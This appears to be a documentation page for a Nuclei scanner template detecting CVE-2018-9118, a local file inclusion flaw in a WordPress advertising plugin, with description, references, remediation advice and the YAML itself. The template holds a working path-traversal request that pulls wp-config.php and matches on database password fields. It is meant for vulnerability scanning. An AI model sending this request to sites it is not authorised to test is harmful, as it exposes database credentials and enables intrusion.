WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion
ID: CVE-2018-9118
Severity: high
Author: 0x_Akoko
Tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots
Description
Section titled “Description”WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.
YAML Source
Section titled “YAML Source”id: CVE-2018-9118
info: name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion author: 0x_Akoko severity: high description: | WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. impact: | This vulnerability can lead to unauthorized access to sensitive files on the server, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade to 4.1.15. reference: - https://www.exploit-db.com/exploits/44417 - https://wpvulndb.com/vulnerabilities/9056 - https://99robots.com/docs/wp-background-takeover-advertisements/ - https://nvd.nist.gov/vuln/detail/CVE-2018-9118 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-9118 cwe-id: CWE-22 epss-score: 0.07018 epss-percentile: 0.93949 cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: 99robots product: wp_background_takeover_advertisements framework: wordpress tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots
http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'
matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" condition: and# digest: 490a00463044022014446ab9d882471c8ca3a511976ae8ff9875b3510ce8a6e8873a10a16d7d6d49022053d3bc7b06ed3457a63c6495a0af9b35b4c6050ffee46d76a3d324230e531e88:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-9118.yaml"